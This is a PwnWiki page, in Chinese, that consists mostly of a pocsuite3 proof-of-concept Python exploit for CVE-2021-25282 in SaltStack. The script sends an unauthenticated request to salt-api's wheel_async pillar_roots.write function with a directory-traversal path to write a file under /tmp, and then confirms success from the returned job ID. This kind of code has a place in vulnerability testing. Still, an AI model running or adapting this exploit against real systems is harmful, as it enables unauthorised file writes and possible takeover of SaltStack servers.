🔔️我們已經出現了財務危機,請不要攔截廣告,感謝您的支持🙏🏻️

Saltstack 任意文件寫入漏洞(CVE-2021-25282)

From PwnWiki
Jump to navigation Jump to search
Book.png 這個頁面的內容缺少參考,無法保證內容的準確性。


POC

#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE    
import re
import json


class TestPOC(POCBase):
    vulID = '000'
    version = '1'
    author = 'zhzyker'
    vulDate = '2021-02-27'
    createDate = '2021-03-02'
    updateDate = '2021-03-02'
    references = ['https://github.com/zhzyker/vulmap']
    name = 'SaltStack Arbitrary file writing vulnerability(CVE-2021-25282)'
    appName = 'SaltStack'
    appVersion = '< 3002.5'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
        Unauthorized access to wheel_async, arbitrary code/commands can be executed through salt-api.
    '''

    
    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8000]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            TIMEOUT = 10
            
            url = target + "/run"
            path = "../../../../../../../../../tmp/vuln"
            headers = {
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
                'Content-Type': 'application/json'
                }
            data = {
                'eauth': 'auto',
                'client': 'wheel_async',
                'fun': 'pillar_roots.write',
                'data': 'vuln_cve_2021_25282',
                'path': path
            }
            
            data = json.dumps(data)
            try:
                r = req.post(url, headers=headers, data=data, timeout=TIMEOUT, verify=False)
                # print(r.text)
                tag = list(json.loads(r.text)["return"])[0]["tag"]
                jid = list(json.loads(r.text)["return"])[0]["jid"]
                if r"salt/wheel" in tag:
                    if jid in tag:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = url
                        result['VerifyInfo']['JID'] = jid
                        result['VerifyInfo']['UPLOAD'] = path
                        break
            except:
                pass
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(TestPOC)

版權信息

POC由【之乎者也】提供。